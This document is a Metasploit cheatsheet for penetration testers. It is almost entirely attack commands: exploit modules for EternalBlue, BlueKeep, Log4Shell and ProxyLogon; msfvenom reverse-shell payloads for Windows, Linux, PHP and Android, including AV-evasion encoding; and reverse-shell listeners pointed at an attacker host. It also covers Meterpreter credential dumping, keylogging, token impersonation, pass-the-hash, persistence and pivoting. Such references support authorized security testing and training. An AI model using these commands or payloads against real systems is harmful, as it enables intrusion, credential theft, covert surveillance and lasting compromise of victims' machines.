Metasploit Cheatsheet

Metasploit is a staple of the exploitation phase. This cheatsheet covers the full workflow from module selection through post-exploitation — organized for quick lookup during engagements.

Starting and Connecting

# Start Metasploit
msfconsole
msfconsole -q           # quiet mode (no banner)
msfconsole -r setup.rc  # run resource script on start

# Database setup (for workspace and search)
msfdb init
db_status               # verify connection

# Workspaces
workspace               # list workspaces
workspace -a pentest    # create workspace
workspace pentest        # switch to workspace
workspace -d pentest    # delete workspace

Searching Modules

search type:exploit platform:windows smb           # SMB exploits for Windows
search type:auxiliary name:scanner                  # all auxiliary scanners
search cve:2017-0144                               # EternalBlue by CVE
search name:ms17_010                               # by module name
search rank:excellent type:exploit                 # only excellent-rank exploits

# Module info
info exploit/windows/smb/ms17_010_eternalblue
info -d <module>        # detailed with description

Module Workflow

# Select module
use exploit/windows/smb/ms17_010_eternalblue

# Show options
show options
show advanced           # advanced options
show payloads           # compatible payloads

# Set options
set RHOSTS 192.168.1.100
set RPORT 445
set LHOST 192.168.1.50
set LPORT 4444
set PAYLOAD windows/x64/meterpreter/reverse_tcp

# Global options (persist across modules)
setg LHOST 192.168.1.50
setg LPORT 4444

# Verify and run
check                   # check if target is vulnerable (if supported)
run                     # execute
exploit                 # same as run
exploit -j              # run in background as job

Common Payloads

# Staged (requires stager connection back)
windows/x64/meterpreter/reverse_tcp    # most common Windows
windows/x64/meterpreter/reverse_https  # HTTPS (bypass firewall)
linux/x64/meterpreter/reverse_tcp      # Linux
osx/x64/meterpreter/reverse_tcp        # macOS

# Stageless (entire payload in one)
windows/x64/meterpreter_reverse_tcp
linux/x64/meterpreter_reverse_tcp

# Simple shells (no Meterpreter)
windows/x64/shell/reverse_tcp
linux/x86/shell_reverse_tcp
cmd/unix/reverse_bash
cmd/unix/reverse_python

Payload Generation with msfvenom

# Windows EXE
msfvenom -p windows/x64/meterpreter/reverse_tcp \
         LHOST=192.168.1.50 LPORT=4444 \
         -f exe -o shell.exe

# Windows DLL
msfvenom -p windows/x64/meterpreter/reverse_tcp \
         LHOST=192.168.1.50 LPORT=4444 \
         -f dll -o shell.dll

# PowerShell command (one-liner)
msfvenom -p cmd/windows/reverse_powershell \
         LHOST=192.168.1.50 LPORT=4444

# Linux ELF
msfvenom -p linux/x64/meterpreter/reverse_tcp \
         LHOST=192.168.1.50 LPORT=4444 \
         -f elf -o shell.elf

# PHP webshell
msfvenom -p php/meterpreter/reverse_tcp \
         LHOST=192.168.1.50 LPORT=4444 \
         -f raw -o shell.php

# Python
msfvenom -p python/meterpreter/reverse_tcp \
         LHOST=192.168.1.50 LPORT=4444

# Android APK
msfvenom -p android/meterpreter/reverse_tcp \
         LHOST=192.168.1.50 LPORT=4444 \
         -o payload.apk

# Encode to evade AV
msfvenom -p windows/x64/meterpreter/reverse_tcp \
         LHOST=192.168.1.50 LPORT=4444 \
         -e x64/xor_dynamic -i 5 \
         -f exe -o encoded_shell.exe

Multi/Handler (Listener)

use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 0.0.0.0
set LPORT 4444
set ExitOnSession false   # keep listening after first connection
run -j                    # run as background job

# List active sessions
sessions
sessions -l               # list all

# Interact with session
sessions -i 1             # attach session 1
sessions -u 1             # upgrade shell to Meterpreter

Meterpreter Commands

System

sysinfo                   # OS, hostname, arch
getuid                    # current user
getpid                    # current PID
ps                        # process list
migrate <PID>             # migrate to another process (elevate or stabilize)
kill <PID>                # kill process
shell                     # drop to system shell
execute -f cmd.exe -i -H  # execute command in hidden window

File System

pwd                       # current directory
ls                        # list files
cd /tmp                   # change directory
upload /local/file /remote/path    # upload file
download /remote/file .            # download file
search -f *.txt -d C:\\            # search for files
cat /etc/passwd           # read file
edit /etc/hosts           # edit file
mkdir /tmp/loot           # create directory
rm /tmp/file              # delete file

Networking

ipconfig                  # network interfaces
route                     # routing table
netstat -ano              # open connections
arp -a                    # ARP table
portfwd add -l 8080 -p 80 -r 192.168.2.10   # port forward
portfwd list

Privilege Escalation

getuid                    # check current user
getsystem                 # attempt automatic privilege escalation
                          # (token impersonation, named pipe, etc.)

# If getsystem fails:
background
use post/multi/recon/local_exploit_suggester
set SESSION 1
run

Token Impersonation

use incognito
list_tokens -u            # list available tokens
impersonate_token "DOMAIN\\Administrator"
getuid                    # verify token
drop_token                # revert

Post-Exploitation Modules

# Credential harvesting
use post/windows/gather/credentials/credential_collector
use post/windows/gather/hashdump
use post/linux/gather/hashdump
use post/multi/gather/ssh_creds

# Pass the hash
use exploit/windows/smb/psexec
set SMBUser Administrator
set SMBPass aad3b435b51404eeaad3b435b51404ee:hash_here

# Screenshot & keylogging
screenshot
keyscan_start
keyscan_dump
keyscan_stop

# Persistence (Windows)
use post/windows/manage/persistence_exe
use exploit/windows/local/persistence
run persistence -h            # scheduled task, registry run key

# Enumerate
use post/windows/gather/enum_domain
use post/windows/gather/enum_shares
use post/linux/gather/enum_system

Pivoting

# Route traffic through session
route add 192.168.2.0/24 1    # subnet via session 1
route print

# SOCKS proxy through session
use auxiliary/server/socks_proxy
set VERSION 5
set SRVPORT 1080
run -j

# Then use proxychains:
# proxychains nmap -sT -Pn 192.168.2.1

# Port forward
portfwd add -l 3389 -p 3389 -r 192.168.2.10
# Connect to localhost:3389 to reach 192.168.2.10:3389

Database Commands

hosts                     # list hosts in DB
services                  # list discovered services
vulns                     # list vulnerabilities
creds                     # list credentials
loot                      # list captured loot

# Import Nmap scan into DB
db_nmap -sV -p- 192.168.1.0/24

# Export
db_export -f xml output.xml

Resource Scripts

Automate repetitive tasks:

# Create setup.rc
cat > setup.rc << 'EOF'
use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 0.0.0.0
set LPORT 4444
set ExitOnSession false
run -j
EOF

msfconsole -r setup.rc

Common Module Quick Reference

Vulnerability	Module
EternalBlue (MS17-010)	`exploit/windows/smb/ms17_010_eternalblue`
BlueKeep (RDP)	`exploit/windows/rdp/cve_2019_0708_bluekeep_rce`
SMB PsExec	`exploit/windows/smb/psexec`
Tomcat WAR upload	`exploit/multi/http/tomcat_mgr_upload`
Struts2 RCE	`exploit/multi/http/struts2_content_type_ognl`
Log4Shell	`exploit/multi/misc/log4shell_header_injection`
ProxyLogon	`exploit/windows/http/exchange_proxylogon_rce`
ShellShock	`exploit/multi/http/apache_mod_cgi_bash_env_exec`
Heartbleed	`auxiliary/scanner/ssl/openssl_heartbleed`
SMB brute	`auxiliary/scanner/smb/smb_login`
SSH brute	`auxiliary/scanner/ssh/ssh_login`
FTP brute	`auxiliary/scanner/ftp/ftp_login`